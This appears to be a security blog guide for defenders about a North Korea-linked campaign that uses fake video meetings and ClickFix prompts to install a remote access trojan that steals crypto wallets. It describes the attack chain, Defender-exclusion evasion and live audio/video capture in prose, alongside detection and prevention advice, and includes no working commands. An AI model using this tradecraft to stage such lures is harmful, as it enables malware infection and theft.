In 2026, social engineering has evolved far beyond phishing emails. A newly uncovered campaign shows attackers hosting convincing fake Zoom and Microsoft Teams meetings to compromise victims in real time. This isn’t theoretical—it’s happening now.
A North Korea-linked threat group known as UNC1069 is targeting cryptocurrency professionals with highly orchestrated fake video calls, leveraging trust, urgency, and technical deception to deploy malware and steal digital assets.
For CISOs, SOC analysts, and security engineers, this represents a dangerous convergence of deepfake technology, social engineering, and endpoint compromise.
In this guide, you’ll learn:
- How the fake video meetings cyberattack works end-to-end
- The technical mechanisms behind the malware delivery
- Real-world attack chain insights from threat intelligence
- Key detection signals and defensive strategies
- Best practices aligned with modern frameworks like Zero Trust and MITRE ATT&CK
What Is the Fake Video Meetings Cyberattack?
The fake video meetings cyberattack is a sophisticated social engineering operation where attackers impersonate legitimate business contacts and lure victims into joining counterfeit video conferencing platforms.
Key Characteristics
- Impersonation of venture capital firms
- Use of LinkedIn and Telegram for initial contact
- Scheduling via legitimate tools like Calendly
- Fake platforms mimicking:
- Zoom
- Microsoft Teams
- Google Meet
- Real-time interaction with attackers (sometimes using deepfake video)
Once trust is established, the victim is manipulated into executing malicious code under the guise of fixing technical issues.
How the UNC1069 Attack Chain Works
Understanding the full attack lifecycle is critical for detection and prevention.
1. Initial Access (Social Engineering)
Attackers initiate contact via:
- LinkedIn (often compromised accounts)
- Telegram messaging
They pose as:
- Investors
- Web3 partners
- Venture capital firms
Goal: Build credibility over time.
2. Meeting Setup via Trusted Tools
Victims receive:
- Calendly links
- Invitations to what appear to be legitimate meetings
These links redirect to spoofed conferencing platforms that closely resemble real ones.
3. Fake Meeting Environment
The environment includes:
- Functional UI similar to Zoom/Teams
- Live interaction with attackers
- In some cases, deepfake video of executives
Psychological trigger: Trust + urgency.
4. ClickFix Social Engineering Technique
During the meeting:
- Victim is told their mic or camera isn’t working
- A prompt appears instructing them to fix the issue
The prompt asks users to:
- Copy and paste a command
- Execute it in a terminal
This is the infection point.
5. Malware Deployment (Cabbage RAT Variant)
Once executed:
- PowerShell scripts are downloaded
- A VBScript payload is deployed
- Malware establishes persistence and begins data collection
Technical Breakdown of the Malware
The malware used is a variant of Cabbage RAT (CageyChameleon), tailored for different operating systems.
Capabilities
- System reconnaissance:
- Username
- Hostname
- OS version
- Browser extension harvesting:
- Focus on crypto wallets
- Command-and-control (C2) communication
- Persistent execution via startup shortcuts
Windows-Specific Infection Flow
- User opens admin terminal via shortcut keys
- Executes attacker-provided command
- PowerShell downloads:
- Script 1: Retrieves VBScript payload
- Script 2: Configures system changes
Defense Evasion Techniques
- Adds exclusions to Windows Defender
- Restarts security services
- Executes scripts from temporary directories
Advanced Data Exfiltration Techniques
This campaign goes beyond traditional malware.
Real-Time Audio/Video Capture
Using browser APIs:
navigator.mediaDevices.getUserMedia- WebRTC and WebSocket communication
Impact
- Live recording of victims
- Data streamed to attacker-controlled servers
- Footage reused for:
- Future impersonation
- More convincing social engineering attacks
This creates a dangerous feedback loop of identity compromise.
Real-World Threat Intelligence Insights
Security researchers identified:
- Full attack chain mapped in April 2026
- Infrastructure supporting multiple OS payloads
- Links to:
- Axios NPM package compromise
- Known North Korean threat clusters (e.g., Bluenoroff)
Risk Implications
- Financial theft (cryptocurrency wallets)
- Corporate espionage
- Identity-based attacks using recorded media
Common Mistakes Organizations Make
Even mature security teams can fall for this type of attack.
Critical Missteps
- Trusting meeting invites without verification
- Allowing users to execute terminal commands freely
- Lack of endpoint monitoring for script execution
- Insufficient awareness of real-time social engineering threats
Detection & Threat Hunting Strategies
Security teams should align detection with frameworks like MITRE ATT&CK.
Key Indicators of Compromise (IOCs)
- Execution of scripts from:
- Temp directories
- Unsigned sources
- Unexpected:
- PowerShell activity
- VBScript execution
- Windows Defender exclusions being modified
- Outbound traffic to:
- Domains mimicking Zoom/Meet/Teams
Behavioral Detection Signals
- Users running terminal commands during meetings
- Browser requests accessing media devices unexpectedly
- Abnormal WebRTC connections
Best Practices to Prevent Fake Video Meeting Attacks
1. Enforce Zero Trust Principles
- Verify all meeting invitations
- Require out-of-band validation for sensitive interactions
2. Restrict Script Execution
- Disable or limit:
- PowerShell execution policies
- VBScript usage
- Monitor for:
- Unauthorized script launches
3. Endpoint Detection & Response (EDR)
Deploy EDR solutions capable of:
- Detecting behavioral anomalies
- Blocking suspicious scripts
- Identifying persistence mechanisms
4. Security Awareness Training
Train employees to recognize:
- Urgent technical instructions during calls
- Requests to run commands
- Suspicious meeting platforms
Key rule:
👉 Never execute code during a video call.
5. Browser Security Controls
- Restrict access to media APIs
- Monitor WebRTC usage
- Implement isolation where possible
6. Crypto-Specific Protections
For Web3 organizations:
- Monitor wallet extension activity
- Use hardware wallets where possible
- Segment sensitive systems
Tools & Frameworks for Defense
| Category | Recommended Approach |
|---|---|
| Threat Detection | EDR/XDR platforms |
| Framework Alignment | MITRE ATT&CK |
| Compliance | NIST CSF, ISO 27001 |
| Identity Security | Zero Trust Architecture |
| Threat Intelligence | Continuous monitoring |
Expert Insights: Why This Attack Is So Effective
This campaign succeeds because it combines:
- Human trust exploitation
- Real-time interaction
- Technical sophistication
Unlike phishing emails, this attack:
- Feels legitimate
- Happens live
- Applies pressure
Risk Impact Analysis:
- High likelihood of execution
- High financial impact (crypto theft)
- Long-term identity compromise
FAQs
1. What is a fake video meetings cyberattack?
A fake video meetings cyberattack is a social engineering technique where attackers impersonate legitimate contacts and trick victims into joining malicious conferencing platforms to deliver malware.
2. How does UNC1069 infect victims?
UNC1069 uses fake meeting platforms and ClickFix-style prompts to trick users into executing malicious scripts, which install remote access trojans.
3. What makes this attack different from phishing?
Unlike phishing emails, this attack involves live interaction, deepfake elements, and real-time manipulation, making it far more convincing.
4. Who is most at risk?
- Cryptocurrency professionals
- Web3 developers
- Executives involved in partnerships or investments
5. How can organizations prevent these attacks?
By implementing:
- Zero Trust verification
- Endpoint monitoring
- Script execution controls
- Security awareness training
6. What should I do if I suspect compromise?
- Disconnect the affected system
- Initiate incident response procedures
- Analyze logs for script execution and outbound traffic
- Reset credentials and secure wallets
Conclusion
The fake video meetings cyberattack represents a major evolution in cyber threats—blending social engineering, deepfake technology, and advanced malware into a single attack vector.
For organizations in crypto, Web3, and beyond, this is a wake-up call.
Key Takeaways:
- Never trust meeting platforms blindly
- Treat command execution requests as critical threats
- Invest in behavioral detection and Zero Trust
As attackers become more sophisticated, your defenses must evolve accordingly.
Next Step:
Assess your organization’s exposure to social engineering threats and strengthen your endpoint and identity security posture today.
